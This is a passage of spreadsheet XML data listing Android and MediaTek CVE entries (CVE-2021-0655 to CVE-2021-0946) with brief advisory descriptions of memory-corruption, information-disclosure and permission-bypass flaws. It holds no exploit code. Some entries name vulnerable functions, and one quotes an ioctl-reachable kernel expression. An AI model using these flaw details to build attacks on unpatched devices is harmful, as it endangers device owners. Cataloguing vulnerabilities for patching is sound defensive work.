    <t>CVE-2021-0655</t>
  </si>
  <si>
    <t>In mdlactl driver, there is a possible memory corruption due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05673424; Issue ID: ALPS05673424.</t>
  </si>
  <si>
    <t>CVE-2021-0656</t>
  </si>
  <si>
    <t>In edma driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05709376; Issue ID: ALPS05709376.</t>
  </si>
  <si>
    <t>CVE-2021-0657</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds write due to a stack-based buffer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672103; Issue ID: ALPS05672103.</t>
  </si>
  <si>
    <t>CVE-2021-0658</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05672107.</t>
  </si>
  <si>
    <t>CVE-2021-0659</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05687559; Issue ID: ALPS05687559.</t>
  </si>
  <si>
    <t>CVE-2021-0660</t>
  </si>
  <si>
    <t>In ccu, there is a possible out of bounds read due to incorrect error handling. This could lead to information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05827145; Issue ID: ALPS05827145.</t>
  </si>
  <si>
    <t>CVE-2021-0661</t>
  </si>
  <si>
    <t>In audio DSP, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05844413; Issue ID: ALPS05844413.</t>
  </si>
  <si>
    <t>CVE-2021-0662</t>
  </si>
  <si>
    <t>In audio DSP, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05844434; Issue ID: ALPS05844434.</t>
  </si>
  <si>
    <t>CVE-2021-0663</t>
  </si>
  <si>
    <t>In audio DSP, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05844458; Issue ID: ALPS05844458.</t>
  </si>
  <si>
    <t>CVE-2021-0664</t>
  </si>
  <si>
    <t>In ccu, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05827158; Issue ID: ALPS05827158.</t>
  </si>
  <si>
    <t>CVE-2021-0665</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672113; Issue ID: ALPS05672113.</t>
  </si>
  <si>
    <t>CVE-2021-0666</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672086; Issue ID: ALPS05672086.</t>
  </si>
  <si>
    <t>CVE-2021-0667</t>
  </si>
  <si>
    <t>In apusys, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05670581; Issue ID: ALPS05670581.</t>
  </si>
  <si>
    <t>CVE-2021-0668</t>
  </si>
  <si>
    <t>In apusys, there is a possible memory corruption due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05670521; Issue ID: ALPS05670521.</t>
  </si>
  <si>
    <t>CVE-2021-0669</t>
  </si>
  <si>
    <t>In apusys, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05681550; Issue ID: ALPS05681550.</t>
  </si>
  <si>
    <t>CVE-2021-0670</t>
  </si>
  <si>
    <t>In apusys, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05654663; Issue ID: ALPS05654663.</t>
  </si>
  <si>
    <t>CVE-2021-0671</t>
  </si>
  <si>
    <t>In apusys, there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05664273; Issue ID: ALPS05664273.</t>
  </si>
  <si>
    <t>CVE-2021-0672</t>
  </si>
  <si>
    <t>In Browser app, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-199678035</t>
  </si>
  <si>
    <t>CVE-2021-0673</t>
  </si>
  <si>
    <t>In Audio Aurisys HAL, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05977326; Issue ID: ALPS05977326.</t>
  </si>
  <si>
    <t>CVE-2021-0674</t>
  </si>
  <si>
    <t>In alac decoder, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06064258; Issue ID: ALPS06064237.</t>
  </si>
  <si>
    <t>CVE-2021-0675</t>
  </si>
  <si>
    <t>In alac decoder, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06064258; Issue ID: ALPS06064258.</t>
  </si>
  <si>
    <t>CVE-2021-0676</t>
  </si>
  <si>
    <t>In geniezone driver, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05863009; Issue ID: ALPS05863009.</t>
  </si>
  <si>
    <t>CVE-2021-0677</t>
  </si>
  <si>
    <t>In ccu driver, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05827154; Issue ID: ALPS05827154.</t>
  </si>
  <si>
    <t>CVE-2021-0678</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05722511.</t>
  </si>
  <si>
    <t>CVE-2021-0679</t>
  </si>
  <si>
    <t>In apusys, there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05687781.</t>
  </si>
  <si>
    <t>CVE-2021-0680</t>
  </si>
  <si>
    <t>In system properties, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-192535676</t>
  </si>
  <si>
    <t>CVE-2021-0681</t>
  </si>
  <si>
    <t>In system properties, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-192535337</t>
  </si>
  <si>
    <t>CVE-2021-0682</t>
  </si>
  <si>
    <t>In sendAccessibilityEvent of NotificationManagerService.java, there is a possible disclosure of notification data due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-159624555</t>
  </si>
  <si>
    <t>CVE-2021-0683</t>
  </si>
  <si>
    <t>In runTraceIpcStop of ActivityManagerShellCommand.java, there is a possible deletion of system files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-185398942</t>
  </si>
  <si>
    <t>CVE-2021-0684</t>
  </si>
  <si>
    <t>In TouchInputMapper::sync of TouchInputMapper.cpp, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-179839665</t>
  </si>
  <si>
    <t>CVE-2021-0685</t>
  </si>
  <si>
    <t>In ParsedIntentInfo of ParsedIntentInfo.java, there is a possible parcel serialization/deserialization mismatch due to unsafe deserialization. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-191055353</t>
  </si>
  <si>
    <t>CVE-2021-0686</t>
  </si>
  <si>
    <t>In getDefaultSmsPackage of RoleManagerService.java, there is a possible way to get information about the default sms app of a different device user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-177927831</t>
  </si>
  <si>
    <t>CVE-2021-0687</t>
  </si>
  <si>
    <t>In ellipsize of Layout.java, there is a possible ANR due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-188913943</t>
  </si>
  <si>
    <t>CVE-2021-0688</t>
  </si>
  <si>
    <t>In lockNow of PhoneWindowManager.java, there is a possible lock screen bypass due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-161149543</t>
  </si>
  <si>
    <t>CVE-2021-0689</t>
  </si>
  <si>
    <t>In RGB_to_BGR1_portable of SkSwizzler_opts.h, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-190188264</t>
  </si>
  <si>
    <t>CVE-2021-0690</t>
  </si>
  <si>
    <t>In ih264d_mark_err_slice_skip of ih264d_parse_pslice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-182152757</t>
  </si>
  <si>
    <t>CVE-2021-0691</t>
  </si>
  <si>
    <t>In the SELinux policy configured in system_app.te, there is a possible way for system_app to gain code execution in other processes due to an overly-permissive SELinux policy. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-188554048</t>
  </si>
  <si>
    <t>CVE-2021-0692</t>
  </si>
  <si>
    <t>In sendBroadcastToInstaller of FirstScreenBroadcast.java, there is a possible activity launch due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-179289753</t>
  </si>
  <si>
    <t>CVE-2021-0693</t>
  </si>
  <si>
    <t>In openFile of HeapDumpProvider.java, there is a possible way to retrieve generated heap dumps from debuggable apps due to an unprotected provider. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-184046948</t>
  </si>
  <si>
    <t>CVE-2021-0694</t>
  </si>
  <si>
    <t>In setServiceForegroundInnerLocked of ActiveServices.java, there is a possible way for a background application to regain foreground permissions due to insufficient background restrictions. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-183147114</t>
  </si>
  <si>
    <t>CVE-2021-0695</t>
  </si>
  <si>
    <t>In get_sock_stat of xt_qtaguid.c, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-184018316References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0696</t>
  </si>
  <si>
    <t>In dllist_remove_node of TBD, there is a possible use after free bug due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-242344778</t>
  </si>
  <si>
    <t>CVE-2021-0697</t>
  </si>
  <si>
    <t>In PVRSRVRGXSubmitTransferKM of rgxtransfer.c, there is a possible user after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-238918403</t>
  </si>
  <si>
    <t>CVE-2021-0698</t>
  </si>
  <si>
    <t>In PVRSRVBridgeHeapCfgHeapDetails, there is a possible leak of kernel heap content due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-236848165</t>
  </si>
  <si>
    <t>CVE-2021-0699</t>
  </si>
  <si>
    <t>In HTBLogKM of TBD, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-242345178</t>
  </si>
  <si>
    <t>CVE-2021-0702</t>
  </si>
  <si>
    <t>In RevertActiveSessions of apexd.cpp, there is a possible way to share the wrong file due to an unintentional MediaStore downgrade. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-193932765</t>
  </si>
  <si>
    <t>CVE-2021-0703</t>
  </si>
  <si>
    <t>In SecondStageMain of init.cpp, there is a possible use after free due to incorrect shared_ptr usage. This could lead to local escalation of privilege if the attacker has physical access to the device, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-184569329</t>
  </si>
  <si>
    <t>CVE-2021-0704</t>
  </si>
  <si>
    <t>In createNoCredentialsPermissionNotification and related functions of AccountManagerService.java, there is a possible way to retrieve accounts from the device without permissions due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-179338675</t>
  </si>
  <si>
    <t>CVE-2021-0705</t>
  </si>
  <si>
    <t>In sanitizeSbn of NotificationManagerService.java, there is a possible way to keep service running in foreground and keep granted permissions due to Bypass of Background Service Restrictions. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-185388103</t>
  </si>
  <si>
    <t>CVE-2021-0706</t>
  </si>
  <si>
    <t>In startListening of PluginManagerImpl.java, there is a possible way to disable arbitrary app components due to a missing permission check. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-193444889</t>
  </si>
  <si>
    <t>CVE-2021-0707</t>
  </si>
  <si>
    <t>In dma_buf_release of dma-buf.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-155756045References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0708</t>
  </si>
  <si>
    <t>In runDumpHeap of ActivityManagerShellCommand.java, there is a possible deletion of system files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-183262161</t>
  </si>
  <si>
    <t>CVE-2021-0734</t>
  </si>
  <si>
    <t>In Settings, there is a possible way to determine whether an app is installed without query permissions, due to side channel information disclosure. This could lead to local information disclosure of an installed package, without proper query permissions, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-189122911</t>
  </si>
  <si>
    <t>CVE-2021-0735</t>
  </si>
  <si>
    <t>In PackageManager, there is a possible way to get information about installed packages ignoring limitations introduced in Android 11 due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-188913056</t>
  </si>
  <si>
    <t>CVE-2021-0769</t>
  </si>
  <si>
    <t>In onCreate of AllowBindAppWidgetActivity.java, there is a possible bypass of user interaction requirements due to unclear UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-184676316</t>
  </si>
  <si>
    <t>CVE-2021-0799</t>
  </si>
  <si>
    <t>In ActivityThread.java, there is a possible way to collide the content provider's authorities. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-197647956</t>
  </si>
  <si>
    <t>CVE-2021-0869</t>
  </si>
  <si>
    <t>In GetTimeStampAndPkt of DumpstateDevice.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-179620905 References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-0870</t>
  </si>
  <si>
    <t>In RW_SetActivatedTagType of rw_main.cc, there is possible memory corruption due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-192472262</t>
  </si>
  <si>
    <t>CVE-2021-0871</t>
  </si>
  <si>
    <t>In PVRSRVBridgePMRPDumpSymbolicAddr of the PowerVR kernel driver, a missing size check means there is a possible integer overflow that could allow out-of-bounds heap access. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-238921253</t>
  </si>
  <si>
    <t>CVE-2021-0887</t>
  </si>
  <si>
    <t>In PVRSRVBridgeHeapCfgHeapConfigName, there is a possible leak of kernel heap content due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-236848817</t>
  </si>
  <si>
    <t>CVE-2021-0889</t>
  </si>
  <si>
    <t>In Android TV , there is a possible silent pairing due to lack of rate limiting in the pairing flow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-8.1 Android-9Android ID: A-180745296</t>
  </si>
  <si>
    <t>CVE-2021-0891</t>
  </si>
  <si>
    <t>An unprivileged app can trigger PowerVR driver to return an uninitialized heap memory causing information disclosure.Product: AndroidVersions: Android SoCAndroid ID: A-236849490</t>
  </si>
  <si>
    <t>CVE-2021-0893</t>
  </si>
  <si>
    <t>In apusys, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05687474.</t>
  </si>
  <si>
    <t>CVE-2021-0894</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05672038.</t>
  </si>
  <si>
    <t>CVE-2021-0895</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05672003.</t>
  </si>
  <si>
    <t>CVE-2021-0896</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05671206.</t>
  </si>
  <si>
    <t>CVE-2021-0897</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05670549.</t>
  </si>
  <si>
    <t>CVE-2021-0898</t>
  </si>
  <si>
    <t>In apusys, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05672071.</t>
  </si>
  <si>
    <t>CVE-2021-0899</t>
  </si>
  <si>
    <t>In apusys, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05672059.</t>
  </si>
  <si>
    <t>CVE-2021-0900</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05672055.</t>
  </si>
  <si>
    <t>CVE-2021-0901</t>
  </si>
  <si>
    <t>In apusys, there is a possible memory corruption due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05664618.</t>
  </si>
  <si>
    <t>CVE-2021-0902</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05656484.</t>
  </si>
  <si>
    <t>CVE-2021-0903</t>
  </si>
  <si>
    <t>In apusys, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05672107; Issue ID: ALPS05656488.</t>
  </si>
  <si>
    <t>CVE-2021-0904</t>
  </si>
  <si>
    <t>In SRAMROM, there is a possible permission bypass due to an insecure permission setting. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06076938; Issue ID: ALPS06076938.</t>
  </si>
  <si>
    <t>CVE-2021-0918</t>
  </si>
  <si>
    <t>In gatt_process_notification of gatt_cl.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-197536150</t>
  </si>
  <si>
    <t>CVE-2021-0919</t>
  </si>
  <si>
    <t>In getService of IServiceManager.cpp, there is a possible unhandled exception due to an integer overflow. This could lead to local denial of service making the lockscreen unusable with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-197336441</t>
  </si>
  <si>
    <t>CVE-2021-0920</t>
  </si>
  <si>
    <t>In unix_scm_to_skb of af_unix.c, there is a possible use after free bug due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196926917References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0921</t>
  </si>
  <si>
    <t>In ParsingPackageImpl of ParsingPackageImpl.java, there is a possible parcel serialization/deserialization mismatch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-195962697</t>
  </si>
  <si>
    <t>CVE-2021-0922</t>
  </si>
  <si>
    <t>In enforceCrossUserOrProfilePermission of PackageManagerService.java, there is a possible bypass of INTERACT_ACROSS_PROFILES permission due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-195630721</t>
  </si>
  <si>
    <t>CVE-2021-0923</t>
  </si>
  <si>
    <t>In createOrUpdate of Permission.java, there is a possible way to gain internal permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-195338390</t>
  </si>
  <si>
    <t>CVE-2021-0924</t>
  </si>
  <si>
    <t>In xhci_vendor_get_ops of xhci.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-194461020References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0925</t>
  </si>
  <si>
    <t>In rw_t4t_sm_detect_ndef of rw_t4t.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure due to a limited change in behavior based on the out of bounds data with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-191444150</t>
  </si>
  <si>
    <t>CVE-2021-0926</t>
  </si>
  <si>
    <t>In onCreate of NfcImportVCardActivity.java, there is a possible way to add a contact without user's consent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-191053931</t>
  </si>
  <si>
    <t>CVE-2021-0927</t>
  </si>
  <si>
    <t>In requestChannelBrowsable of TvInputManagerService.java, there is a possible permission bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-8.1 Android-9Android ID: A-189824175</t>
  </si>
  <si>
    <t>CVE-2021-0928</t>
  </si>
  <si>
    <t>In createFromParcel of OutputConfiguration.java, there is a possible parcel serialization/deserialization mismatch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-188675581</t>
  </si>
  <si>
    <t>CVE-2021-0929</t>
  </si>
  <si>
    <t>In ion_dma_buf_end_cpu_access and related functions of ion.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-187527909References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0930</t>
  </si>
  <si>
    <t>In phNxpNciHal_process_ext_rsp of phNxpNciHal_ext.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over NFC with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-181660091</t>
  </si>
  <si>
    <t>CVE-2021-0931</t>
  </si>
  <si>
    <t>In getAlias of BluetoothDevice.java, there is a possible way to create misleading permission dialogs due to missing data filtering. This could lead to local information disclosure with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-180747689</t>
  </si>
  <si>
    <t>CVE-2021-0932</t>
  </si>
  <si>
    <t>In showNotification of NavigationModeController.java, there is a possible confused deputy due to an unsafe PendingIntent. This could lead to local escalation of privilege that allows actions performed as the System UI with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-173025705</t>
  </si>
  <si>
    <t>CVE-2021-0933</t>
  </si>
  <si>
    <t>In onCreate of CompanionDeviceActivity.java or DeviceChooserActivity.java, there is a possible way for HTML tags to interfere with a consent dialog due to improper input validation. This could lead to remote escalation of privilege, confusing the user into accepting pairing of a malicious Bluetooth device, with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-172251622</t>
  </si>
  <si>
    <t>CVE-2021-0935</t>
  </si>
  <si>
    <t>In ip6_xmit of ip6_output.c, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168607263References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0936</t>
  </si>
  <si>
    <t>In acc_read of f_accessory.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-173789633References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0938</t>
  </si>
  <si>
    <t>In memzero_explicit of compiler-clang.h, there is a possible bypass of defense in depth due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-171418586References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0939</t>
  </si>
  <si>
    <t>In set_default_passthru_cfg of passthru.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-186026549References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-0940</t>
  </si>
  <si>
    <t>In TBD of TBD, there is a possible out of bounds write due to improper locking. This could lead to local escalation of privilege in the kernel with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-171315276References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-0941</t>
  </si>
  <si>
    <t>In bpf_skb_change_head of filter.c, there is a possible out of bounds read due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-154177719References: Upstream kernel</t>
  </si>
  <si>
    <t>CVE-2021-0942</t>
  </si>
  <si>
    <t>The path in this case is a little bit convoluted. The end result is that via an ioctl an untrusted app can control the ui32PageIndex offset in the expression:sPA.uiAddr = page_to_phys(psOSPageArrayData-&gt;pagearray[ui32PageIndex]);With the current PoC this crashes as an OOB read. However, given that the OOB read value is ending up as the address field of a struct I think i seems plausible that this could lead to an OOB write if the attacker is able to cause the OOB read to pull an interesting kernel address. Regardless if this is a read or write, it is a High severity issue in the kernel.Product: AndroidVersions: Android SoCAndroid ID: A-238904312</t>
  </si>
  <si>
    <t>CVE-2021-0943</t>
  </si>
  <si>
    <t>In MMU_MapPages of TBD, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-238916921</t>
  </si>
  <si>
    <t>CVE-2021-0946</t>
  </si>
  <si>
